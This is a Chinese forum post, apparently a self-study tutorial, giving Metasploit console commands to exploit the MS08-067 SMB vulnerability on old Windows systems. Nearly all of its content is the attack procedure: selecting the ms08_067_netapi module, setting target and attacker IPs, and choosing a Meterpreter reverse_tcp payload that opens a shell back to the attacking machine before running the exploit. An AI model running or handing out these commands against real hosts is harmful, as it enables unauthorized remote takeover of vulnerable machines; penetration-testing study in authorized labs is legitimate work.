找回密码
 register

QQ登录

只需一步,快速开始

查看: 2442|回复: 0

[每天自学] Metasploit之MS08-067远程执行代码漏洞利用过程

[复制链接]

[每天自学] Metasploit之MS08-067远程执行代码漏洞利用过程

[复制链接]
  • 打卡等级:热心大叔
  • 打卡总天数:94
  • 打卡月天数:17
  • 打卡总奖励:94
  • 最近打卡:2025-01-18 01:28:20
Waylee

主题

0

回帖

1万

积分

仙帝

积分
11929
Waylee 2020-7-6 22:59 | 显示全部楼层 |阅读模式

马上注册,查看网站隐藏内容!!

您需要 登录 才可以下载或查看,没有账号?register

×
使用ms08_067_netapi攻击模块。
攻击目标445端口
目标IP:RHOST攻击机IP:LHOST
受影响目标系统 Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta

配置exploit
msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.2.242
回显内容rhost => 192.168.2.242

查看可攻击目标信息
show targets
set target 34

有效攻击载荷
show payloads

配置payload
payload只需要配置监听返回会话的IP;
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.222

查看攻击选项
show options

执行漏洞
exploit



您需要登录后才可以回帖 登录 | register

本版积分规则

雪舞知识库 | 浙ICP备15015590号-1 | 萌ICP备20232229号|浙公网安备33048102000118号 |天天打卡

GMT+8, 2025-1-18 15:36 , Processed in 0.108740 second(s), 8 queries , Redis On.

Powered by XueWu Licensed

Copyright © Tencent Cloud.

快速回复 返回顶部 返回列表